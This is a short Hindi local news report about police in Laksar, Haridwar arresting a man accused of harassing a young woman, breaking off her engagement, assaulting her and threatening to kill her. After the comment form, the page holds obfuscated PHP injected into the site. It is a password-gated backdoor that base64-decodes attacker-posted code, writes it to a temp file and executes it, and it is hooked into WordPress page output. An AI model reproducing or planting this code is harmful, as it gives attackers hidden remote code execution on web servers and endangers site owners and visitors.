Haridwar लक्सर में युवती की सगाई तुड़वाकर जान से मारने की देता था धमकी आरोपी गिरफ्तार

Uttarakhand Press 15 June 2023 लक्सर: कोतवाली क्षेत्र के एक गांव में घर में घुसकर युवती के साथ मारपीट करने और जान से मारने की धमकी देने वाले आरोपी को पुलिस ने गिरफ्तार कर लिया है. आरोपी के विरुद्ध पुलिस ने संबंधित धाराओं में मुकदमा दर्ज कर न्यायालय के समक्ष पेश कर दिया है.

सिरफिरे की धमकी से युवती परेशान:

लक्सर कोतवाली क्षेत्र के एक गांव निवासी युवती ने पुलिस को तहरीर दी थी. तहरीर में युवती ने आरोप लगाया कि एक व्यक्ति उसे फोन पर परेशान कर रहा है. युवती का आरोप था कि उस व्यक्ति ने उसकी सगाई भी तुड़वा दी है. युवती ने जब उसका विरोध किया तो आरोपी उसके घर में घुस आया और उसके साथ मारपीट कर गाली-गलौज करते हुए जान से मारने की धमकी दी. लक्सर पुलिस ने युवती की तहरीर के आधार पर संबंधित धाराओ में मुकदमा दर्ज कर आरोपी गिरफ्तार कर लिया है.

कोतवाल ने क्या कहा:

कोतवाली प्रभारी अमरजीत सिंह ने कहा कि आरोपी चाहे कितना ही शातिर क्यों न हो, पुलिस की आंखों में धूल नहीं झोंक सकता. आरोपी को गिरफ्तार करके न्यायालय के समक्ष पेश किया गया. युवती के परिजनों को सांत्वना देते हुए समझाया गया है. पुलिस ने परिजनों को आश्वस्त किया कि वो लोग डरें नहीं. यदि किसी तरह की घटना घटती है, तो पुलिस को तुरंत सूचना दें. पुलिस हर संभव मदद करेगी.

Read Previous

Udham Singh Nagar: युवक ने धर्म छिपाकर तलाकशुदा महिला से शादी करने का झांसा देकर दुष्कर्म किया

Read Next

Kupwara Encounter: कुपवाड़ा LoC पर सुरक्षाबलों से मुठभेड़ में पांच आतंकी ढेर, सर्च ऑपरेशन जारी; हथियार बरामद

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}